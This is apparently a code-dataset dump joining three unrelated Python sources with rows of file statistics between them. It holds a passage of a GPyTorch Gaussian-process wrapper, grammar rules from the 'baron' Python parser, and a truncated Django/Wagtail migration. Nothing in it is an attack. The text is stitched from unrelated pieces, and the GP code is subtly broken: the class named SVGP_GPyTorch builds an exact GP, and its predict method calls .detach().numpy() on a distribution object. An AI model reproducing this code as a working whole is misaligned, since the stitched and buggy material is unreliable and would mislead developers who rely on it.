def __init__(self, train_x, train_y, likelihood):
super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.ConstantMean()
self.covar_module = gpytorch.kernels.ScaleKernel(kernel)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.GaussianLikelihood()
self.model = ExactGPModel(train_x, train_y, self.likelihood)
def fit(self, train_x, train_y):
# if self.validation is not None:
# if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
# if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
# train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
# valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x.astype(np.float32))
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y.astype(np.float32))
print(train_x.shape, train_y.shape)
# Check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
self.kernel = gpytorch.kernels.MaternKernel(nu=1.5)
# create simple GP model
if len(self.train_loss)==0:
self.prepare_model(train_x, train_y, kernel=self.kernel)
# Find optimal model hyperparameters
self.model.train()
self.likelihood.train()
if self.optimizer is None:
print('Using the adam optimizer.')
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
# "Loss" for GPs - the marginal log likelihood
if self.loss_fn in [None, 'marginal_log_likelihood', 'mll']:
mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self.model)
else:
mll = self.loss_fn
# optimize
for i in range(len(self.train_loss),self.max_iter):
# Zero gradients from previous iteration
self.optimizer.zero_grad()
# Output from model
output = self.model(train_x)
#print(type(output))
#print(output)
# Calc loss and backprop gradients
#print(output, train_y.shape)
loss = -mll(output, train_y)
loss.backward()
self.train_loss.append(loss.item())
# if self.validation:
# self.model.eval()
# self.likelihood.eval()
# valid_out = self.likelihood(self.model(valid_x))
# valid_ls = -mll(valid_out, valid_y)
# self.valid_loss.append(valid_ls.item())
# print('Iter %d/%d - Train Loss: %.3f Valid Loss: %.3f ' % (
# i + 1, self.max_iter, self.train_loss[-1], self.valid_loss[-1]
# ))
# self.model.train()
# self.likelihood.train()
# else:
print('Iter %d/%d - Loss: %.3f ' % (
i + 1, self.max_iter, self.train_loss[-1]
))
self.optimizer.step()
def predict(self, X_test, return_ci=True):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))
# Get into evaluation (predictive posterior) mode
model, likelihood = self.model, self.likelihood
model.eval()
likelihood.eval()
# Test points are regularly spaced along [0,1]
# Make predictions by feeding model through likelihood
with torch.no_grad(), gpytorch.settings.fast_pred_var():
observed_pred = likelihood(model(X_test))
if return_ci:
lower, upper = observed_pred.confidence_region()
return observed_pred.mean.numpy(), lower.detach().numpy(), upper.detach().numpy()
return observed_pred.detach().numpy()
def score(self, X_test, y_test):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_ci=False)
scr = r2_score(y_test, y_pred)
return scr
class SVGP_GPyTorch:
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, learning_rate=1e-3, optimizer=None, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.optimizer = optimizer
# self.validation = validation
self.train_loss = []
self.valid_loss = []
def prepare_model(self, train_x, train_y, kernel=None):
multi_task = False
if train_y.ndim>1:
if train_y.shape[1]>1:
multi_task = True
if multi_task:
print('Model for Multivariate output.')
# We will use the GP model for multivariate output, exact inference
class MultitaskGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(MultitaskGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.MultitaskMean(
gpytorch.means.ConstantMean(), num_tasks=train_y.shape[1]
)
self.covar_module = gpytorch.kernels.MultitaskKernel(
kernel, num_tasks=train_y.shape[1], rank=1
)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultitaskMultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.MultitaskGaussianLikelihood(num_tasks=train_y.shape[1])
self.model = MultitaskGPModel(train_x, train_y, self.likelihood)
else:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.ConstantMean()
self.covar_module = gpytorch.kernels.ScaleKernel(kernel)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.GaussianLikelihood()
self.model = ExactGPModel(train_x, train_y, self.likelihood)
def fit(self, train_x, train_y):
# if self.validation is not None:
# if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
# if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
# train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
# valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x.astype(np.float32))
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y.astype(np.float32))
print(train_x.shape, train_y.shape)
# Check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
self.kernel = gpytorch.kernels.MaternKernel(nu=1.5)
# create simple GP model
if len(self.train_loss)==0:
self.prepare_model(train_x, train_y, kernel=self.kernel)
# Find optimal model hyperparameters
self.model.train()
self.likelihood.train()
if self.optimizer is None:
print('Using the adam optimizer.')
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
# "Loss" for GPs - the marginal log likelihood
if self.loss_fn in [None, 'marginal_log_likelihood', 'mll']:
mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self.model)
else:
mll = self.loss_fn
# optimize
for i in range(len(self.train_loss),self.max_iter):
# Zero gradients from previous iteration
self.optimizer.zero_grad()
# Output from model
output = self.model(train_x)
#print(type(output))
#print(output)
# Calc loss and backprop gradients
#print(output, train_y.shape)
loss = -mll(output, train_y)
loss.backward()
self.train_loss.append(loss.item())
# if self.validation:
# self.model.eval()
# self.likelihood.eval()
# valid_out = self.likelihood(self.model(valid_x))
# valid_ls = -mll(valid_out, valid_y)
# self.valid_loss.append(valid_ls.item())
# print('Iter %d/%d - Train Loss: %.3f Valid Loss: %.3f ' % (
# i + 1, self.max_iter, self.train_loss[-1], self.valid_loss[-1]
# ))
# self.model.train()
# self.likelihood.train()
# else:
print('Iter %d/%d - Loss: %.3f ' % (
i + 1, self.max_iter, self.train_loss[-1]
))
self.optimizer.step()
def predict(self, X_test, return_ci=True):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))
# Get into evaluation (predictive posterior) mode
model, likelihood = self.model, self.likelihood
model.eval()
likelihood.eval()
# Test points are regularly spaced along [0,1]
# Make predictions by feeding model through likelihood
with torch.no_grad(), gpytorch.settings.fast_pred_var():
observed_pred = likelihood(model(X_test))
if return_ci:
lower, upper = observed_pred.confidence_region()
return observed_pred.detach().numpy(), lower.detach().numpy(), upper.detach().numpy()
return observed_pred.detach().numpy()
def score(self, X_test, y_test):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_ci=False)
scr = r2_score(y_test, y_pred)
return scr
| 42.649418 | 221 | 0.611077 | 4,482 | 32,968 | 4.2722 | 0.066934 | 0.026948 | 0.014989 | 0.018801 | 0.890276 | 0.872937 | 0.859776 | 0.843639 | 0.830426 | 0.8216 | 0 | 0.011044 | 0.280393 | 32,968 | 772 | 222 | 42.704663 | 0.796071 | 0.117326 | 0 | 0.75419 | 0 | 0.001862 | 0.048956 | 0.002415 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083799 | false | 0 | 0.024209 | 0 | 0.184358 | 0.05959 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
98bfbea33a1ccdddc4cf6f13132c0b3d2af49a17 | 11,387 | py | Python | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | 2 | 2022-01-31T03:13:46.000Z | 2022-01-31T03:14:22.000Z | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | null | null | null | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | null | null | null | def include_control_structures(pg):
@pg.production("try_stmt : TRY COLON suite excepts")
def try_excepts_stmt(pack):
(try_, colon, suite, excepts) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": {},
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts else_stmt")
def try_excepts_else_stmt(pack):
(try_, colon, suite, excepts, else_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": else_stmt,
"finally": {},
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts finally_stmt")
def try_excepts_finally_stmt(pack):
(try_, colon, suite, excepts, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": finally_stmt,
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts else_stmt finally_stmt")
def try_excepts_else_finally_stmt(pack):
(try_, colon, suite, excepts, else_stmt, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": else_stmt,
"finally": finally_stmt,
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite finally_stmt")
def try_stmt(pack):
(try_, colon, suite, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": finally_stmt,
"excepts": [],
}]
@pg.production("excepts : excepts except_stmt")
def excepts(pack):
(excepts_, except_stmt) = pack
return excepts_ + except_stmt
@pg.production("excepts : except_stmt")
def excepts_except_stmt(pack):
(except_stmt,) = pack
return except_stmt
@pg.production("except_stmt : EXCEPT test AS test COLON suite")
def except_as_stmt(pack):
(except_, test, as_, test2, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": as_.hidden_tokens_before,
"third_formatting": as_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "as",
"target": test2,
"exception": test,
"value": suite
}]
@pg.production("except_stmt : EXCEPT test COMMA test COLON suite")
def except_comma_stmt(pack):
(except_, test, comma, test2, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": comma.hidden_tokens_before,
"third_formatting": comma.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": ",",
"target": test2,
"exception": test,
"value": suite
}]
@pg.production("except_stmt : EXCEPT COLON suite")
def except_stmt_empty(pack):
(except_, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": [],
"third_formatting": [],
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "",
"target": {},
"exception": {},
"value": suite
}]
@pg.production("except_stmt : EXCEPT test COLON suite")
def except_stmt(pack):
(except_, test, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": [],
"third_formatting": [],
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "",
"target": {},
"exception": test,
"value": suite
}]
@pg.production("finally_stmt : FINALLY COLON suite")
def finally_stmt(pack):
(finally_, colon, suite) = pack
return {
"type": "finally",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
}
@pg.production("else_stmt : ELSE COLON suite")
def else_stmt(pack):
(else_, colon, suite) = pack
return {
"type": "else",
"value": suite,
"first_formatting": else_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_after,
}
@pg.production("for_stmt : FOR exprlist IN testlist COLON suite")
def for_stmt(pack,):
(for_, exprlist, in_, testlist, colon, suite) = pack
return [{
"type": "for",
"value": suite,
"iterator": exprlist,
"target": testlist,
"else": {},
"first_formatting": for_.hidden_tokens_after,
"second_formatting": in_.hidden_tokens_before,
"third_formatting": in_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
}]
@pg.production("for_stmt : FOR exprlist IN testlist COLON suite else_stmt")
def for_else_stmt(pack,):
(for_, exprlist, in_, testlist, colon, suite, else_stmt) = pack
return [{
"type": "for",
"value": suite,
"iterator": exprlist,
"target": testlist,
"else": else_stmt,
"first_formatting": for_.hidden_tokens_after,
"second_formatting": in_.hidden_tokens_before,
"third_formatting": in_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
}]
@pg.production("while_stmt : WHILE test COLON suite")
def while_stmt(pack):
(while_, test, colon, suite) = pack
return [{
"type": "while",
"value": suite,
"test": test,
"else": {},
"first_formatting": while_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
@pg.production("while_stmt : WHILE test COLON suite else_stmt")
def while_stmt_else(pack):
(while_, test, colon, suite, else_stmt) = pack
return [{
"type": "while",
"value": suite,
"test": test,
"else": else_stmt,
"first_formatting": while_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
@pg.production("if_stmt : IF test COLON suite")
def if_stmt(pack):
(if_, test, colon, suite) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
}]
@pg.production("if_stmt : IF test COLON suite elifs")
def if_elif_stmt(pack):
(if_, test, colon, suite, elifs) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}] + elifs
}]
@pg.production("elifs : elifs ELIF test COLON suite")
def elifs_elif(pack,):
(elifs, elif_, test, colon, suite) = pack
return elifs + [{
"type": "elif",
"first_formatting": elif_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
"value": suite,
"test": test,
}]
@pg.production("elifs : ELIF test COLON suite")
def elif_(pack,):
(elif_, test, colon, suite) = pack
return [{
"type": "elif",
"first_formatting": elif_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
"value": suite,
"test": test,
}]
@pg.production("if_stmt : IF test COLON suite else_stmt")
def if_else_stmt(pack):
(if_, test, colon, suite, else_stmt) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}, else_stmt]
}]
@pg.production("if_stmt : IF test COLON suite elifs else_stmt")
def if_elif_else_stmt(pack):
(if_, test, colon, suite, elifs, else_stmt) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}] + elifs + [else_stmt]
}]
| 37.705298 | 79 | 0.523492 | 1,054 | 11,387 | 5.335863 | 0.043643 | 0.136558 | 0.153094 | 0.196835 | 0.907361 | 0.840505 | 0.791074 | 0.76867 | 0.706259 | 0.683855 | 0 | 0.000552 | 0.364099 | 11,387 | 301 | 80 | 37.830565 | 0.776136 | 0 | 0 | 0.681004 | 0 | 0 | 0.230263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086022 | false | 0 | 0 | 0 | 0.168459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c70b135deb200cb553f13c25c31231a3967d6230 | 17,081 | py | Python | cotr/cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/cotr | 4afbfdd36d4dd0ee9f56152d3c963453c81e440c | [
"MIT"
] | null | null | null | cotr/cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/cotr | 4afbfdd36d4dd0ee9f56152d3c963453c81e440c | [
"MIT"
] | 27 | 2020-12-28T17:34:59.000Z | 2022-03-12T00:25:43.000Z | cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/ctrs-django | 7170b4f15bd9d097d00f215d747a02a9b656768c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.9 on 2020-03-13 12:58
import cms.models.streamfield
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('cms', '0010_auto_20191205_1519'),
]
operations = [
migrations.AlterField(
model_name='blogindexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='blogpost',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='homepage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='indexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='peopleindexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='peoplepage',
name='body',
